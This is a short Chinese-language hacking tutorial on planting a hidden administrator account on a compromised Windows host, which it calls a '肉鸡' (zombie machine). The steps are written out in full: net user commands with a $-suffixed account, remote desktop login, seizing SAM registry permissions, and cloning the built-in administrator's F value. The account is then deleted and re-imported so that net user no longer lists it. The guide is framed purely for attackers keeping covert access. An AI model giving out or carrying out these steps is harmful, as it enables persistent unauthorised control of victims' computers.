建立隐藏管理员用户

1、远程命令提示符下输入命令“net user 用户名$ 密码 /add” 和 “net localgroup administrators 用户名$ /add”
  2、打开远程登陆工具，单击开始菜单 点击“运行” 或 windows键+R 打开运行对话框，输入“mstsc” 回车
  3、填上肉鸡IP 并 连接
  4、登陆后，运行注册表“regedit”修改SAM权限，即 找到“HKEY_LOCAL_MACHINE\SAM\SAM” 右键查看权限，勾上“完全控制”
  5、F5刷新，找到：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\asp$ ，然后导出 “000001F4，000003EC、用户名$” 为1.reg、 2.reg、 3.reg
  6、net user 用户名$ /del
  7、将超级用户对应的项000001F4下的键"F"的值复制，并覆盖 “用户名$” 对应的项00000xxx下的键"F"的值,然后再将00000xxx与3.reg合并，并双击导入注册表
  8、然后改回SAM的权限，HKEY_LOCAL_MACHINE\SAM\SAM点击右键权限（只要删除添加的帐户administrator即可）
  9、到此隐藏用户建立成功
  10、断开连接，重新登陆试试，成功 ~~~能登陆
  看到了吧，net  user 命令 看不到 asp$ 用户